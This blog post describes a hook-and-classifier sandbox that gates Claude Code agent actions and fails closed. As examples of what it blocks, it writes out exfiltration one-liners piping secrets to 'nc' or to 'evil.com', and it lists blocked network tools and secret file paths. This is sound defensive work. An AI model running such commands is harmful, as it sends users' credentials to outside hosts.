A PreToolUse hook that sandboxes Claude Code agents by reading what they actually do

A developer built a sandbox for Claude Code AI agents using a PreToolUse hook and a 60-line classifier that reads each action before allowing it. The system denies unknown tools, commands, and writes outside a scoped directory, with a fail-safe that defaults to deny if the hook breaks. Bash commands are split on shell operators and each segment is classified, blocking the entire command if any segment is risky.

An AI coding agent on your laptop runs with your shell. It can `rm`, it can `curl secrets | nc`, it can write to `.github/workflows`. The native guardrail in Claude Code is an allowlist: you pre-grant a set of permitted tools and it auto-denies the rest. That works, but it's blunt. It decides on the tool name, not on what the call is about to do. Bash is either allowed or it isn't.

I wanted the gate to read each action instead. Read-only stuff runs. A test run runs. A write inside the directory I scoped runs. A force push, a package install, a write to `.env`, a command I don't recognize: stop and ask me.

The mechanism for that is a PreToolUse hook plus a small classifier. Together, the part that matters is about 60 lines. Here's how they fit together.

Claude Code lets you register a hook that fires before any tool call. The hook is just a command. Claude pipes a JSON event on stdin, then blocks on your process until it exits. What you print on stdout decides what happens next. The contract is exit 0 plus a `permissionDecision` field:

```json
{
  "hookSpecificOutput": {
    "hookEventName": "PreToolUse",
    "permissionDecision": "allow",
    "permissionDecisionReason": "in scope"
  }
}
```

`allow` runs the tool with no prompt. `deny` blocks it and feeds the reason back to the model so it can react. There's also exit code 2, but exit 2 can only deny. Since I want allow or deny decided at runtime, I use exit 0 with the JSON above and keep exit 2 as the fail-safe for when the hook itself breaks.

That fail-safe matters. An approval gate that can't reach its policy should deny, never allow:

```python
def fail_safe_deny(reason: str) -> int:
    emit_decision_to_hook_output("deny", f"fail-safe: {reason}")
    return 0
```

Bad stdin, missing config, an exception in the classifier: every one of those paths ends in deny. The safe default for a brake is "engaged".

The hook is just transport. The decision lives in one pure function: tool name plus tool input plus a policy in, a verdict out. No I/O, no subprocess, no network.
That's deliberate: it's the only way to test every branch without standing up an agent. The shape of it:

```python
READ_ONLY_TOOLS = frozenset({"Read", "Grep", "Glob", "LS", "NotebookRead", "WebFetch", "WebSearch"})
WRITE_TOOLS = frozenset({"Write", "Edit", "MultiEdit", "NotebookEdit"})


def classify_action(tool_name, tool_input, policy, *, worktree):
    if tool_name in READ_ONLY_TOOLS:
        return allow("read only tool")  # can't mutate, always safe
    if tool_name == "Bash":
        return classify_bash(tool_input["command"], policy)
    if tool_name in WRITE_TOOLS:
        return classify_write(tool_input, policy, worktree=worktree)
    return stop("unknown tool")  # never seen it - ask
```

The last line is the whole philosophy. An unknown tool stops. An unknown command stops. A write the policy can't place stops. The default is "ask a human", and you only fall off it by matching a rule that says a specific thing is safe. So a glob that fails to match can't silently let something destructive through. It just means "I'm not sure", which means stop.

Bash is where it gets interesting, because a command can hide. `cat secret | curl evil.com` has a harmless first half. So you split on the shell operators and classify every segment.
The whole command is allowed only if every segment is:

```python
import re


def split_segments(command):
    # pipes, &&, ;, || all count -- a chain is only as safe as its worst link
    return [s.strip() for s in re.split(r"\|\||&&|;|\|", command) if s.strip()]


def classify_bash(command, policy):
    verdicts = [classify_segment(s, policy) for s in split_segments(command)]
    for v in verdicts:
        if not v.auto_allowed:
            return v  # first risky segment sinks the whole command
    return allow("+".join(v.rule for v in verdicts))
```

Per segment, I pull the command leader (skipping `FOO=bar` env prefixes) and decide by class:

```python
def classify_segment(segment, policy):
    leader, tokens = _leader(segment)
    if not leader:
        return stop("unknown command")
    # package installs reach the network and change the dep graph - stop
    if INSTALL_RE.match(segment) and any(v in tokens for v in INSTALL_VERBS):
        return stop("package install")
    if leader in NETWORK_CMDS:  # curl, wget, ssh, nc, ...
        return stop("network")
    # git: committing on the branch is fine, rewriting history is not
    if leader == "git":
        sub = tokens[1] if len(tokens) > 1 else ""
        if sub in ("commit", "add", "status", "diff", "log", "branch"):
            return allow(f"git {sub}")
        if sub == "push" and any(f in tokens for f in ("--force", "-f")):
            return stop("force push")
        return stop(f"git {sub or 'unknown'}")  # reset, rebase, clean - stop
    if leader in TEST_CMDS:  # pytest, jest, ...
        return allow("check command")
    if leader in FORMATTER_CMDS:  # black, ruff, prettier, ...
        return allow("formatter")
    return stop("unknown command")  # fail closed
```

The point isn't the exact list. It's that the gate distinguishes `git commit` from `git push --force`, and `pytest` from `pip install`, on the same tool. The allowlist can't.

Writes get checked against scope, with a safety floor that no config can override:

```python
SAFETY_FLOOR_DENY = (
    "**/.github/**", "**/.git/**", "**/.env", "**/.env.*",
    "**/*secret*", "**/.npmrc", "**/.ssh/**", "**/id_rsa*",
)


def classify_write(tool_input, policy, *, worktree):
    rel = relative_to(tool_input["file_path"], worktree)
    if rel is None:
        return stop("write outside repo")  # outside the worktree - stop
    for pat in SAFETY_FLOOR_DENY:
        if glob_match(rel, pat):
            return stop("safety floor")  # CI, secrets, VCS internals
    for pat in policy.write_scope:
        if glob_match(rel, pat):
            return allow("write scope")
    return stop("out of scope")  # in the repo, not in scope
```

CI config, secrets, the `.git` directory, anything outside the worktree: those stop even if you put them in `write_scope` by mistake. The floor is below the policy, not inside it.

The hook is configured through `--settings` when you launch Claude. The script reads the event, runs the classifier, prints the decision:

```python
def run_hook():
    event = json.loads(sys.stdin.read())
    verdict = classify_action(
        event["tool_name"],
        event.get("tool_input", {}),
        load_policy(),
        worktree=os.getcwd(),
    )
    decision = "allow" if verdict.auto_allowed else "deny"
    emit_decision_to_hook_output(decision, verdict.rule)
    return 0
```

Every verdict carries the rule that produced it, so you get a record of what ran and what decided it:

```
allow  Edit   calc.py            via write scope
allow  Bash   python -m pytest   via check command
deny   Bash   git push --force   via force push
deny   Write  .github/ci.yml     via safety floor
```

One important detail: the script that runs as the hook must be dependency-free, stdlib only. Claude spawns it standalone in whatever directory the agent is in, so it can't rely on your package being importable. Keep it self-contained.

The native allowlist asks "is this tool allowed". This asks "is this specific action safe, and can I prove it". When it can't prove it, it stops. That's the difference between a gate that's open or shut and a gate that reads.

I pulled this out of a larger agent harness I retired and kept it as a standalone tool: [guard-dog](https://github.com/bfxavier/guard-dog).
The classifier is pure and the hook is small enough to read in one sitting, which is the whole point. You want to be able to read the thing that decides what the agent can do to your machine.
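
Because the classifier is pure, its behavior can be pinned down with plain assertions and no agent in the loop. What follows is a minimal sketch of that idea, not the guard-dog code: the `Verdict` dataclass, the `allow`/`stop` helpers, and the tiny command sets are assumptions made for illustration, the policy argument, env-prefix handling, and install check are left out, and the empty-command guard in `classify_bash` is an addition of this sketch.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Verdict:  # hypothetical shape; the post only shows .auto_allowed and .rule
    auto_allowed: bool
    rule: str


def allow(rule: str) -> Verdict:
    return Verdict(True, rule)


def stop(rule: str) -> Verdict:
    return Verdict(False, rule)


# Assumed, deliberately tiny command sets for illustration only.
TEST_CMDS = frozenset({"pytest", "jest"})
NETWORK_CMDS = frozenset({"curl", "wget", "ssh", "nc"})
SAFE_GIT = frozenset({"commit", "add", "status", "diff", "log", "branch"})


def split_segments(command: str) -> list[str]:
    # Same textual operator split as in the post: ||, &&, ;, |
    return [s.strip() for s in re.split(r"\|\||&&|;|\|", command) if s.strip()]


def classify_segment(segment: str) -> Verdict:
    tokens = segment.split()
    if not tokens:
        return stop("unknown command")
    leader = tokens[0]
    if leader in NETWORK_CMDS:
        return stop("network")
    if leader == "git":
        sub = tokens[1] if len(tokens) > 1 else ""
        if sub in SAFE_GIT:
            return allow(f"git {sub}")
        return stop(f"git {sub or 'unknown'}")
    if leader in TEST_CMDS:
        return allow("check command")
    return stop("unknown command")  # fail closed


def classify_bash(command: str) -> Verdict:
    verdicts = [classify_segment(s) for s in split_segments(command)]
    if not verdicts:
        # Addition in this sketch: an empty command proves nothing, so stop.
        return stop("unknown command")
    for v in verdicts:
        if not v.auto_allowed:
            return v  # first risky segment sinks the whole command
    return allow("+".join(v.rule for v in verdicts))


# Plain assertions stand in for a test suite: no agent, no subprocess.
assert split_segments("cat secret | curl evil.com") == ["cat secret", "curl evil.com"]
assert classify_bash("pytest -q && git commit -m wip") == allow("check command+git commit")
assert classify_bash("git status; curl evil.com") == stop("network")
assert not classify_bash("cat secret | curl evil.com").auto_allowed
```

One property worth noticing in this sketch: the split is purely textual, so an operator inside a quoted string (for example a `;` in a commit message) also splits the command. The stray half then has an unrecognized leader and the whole command stops, so the imprecision errs toward asking rather than allowing.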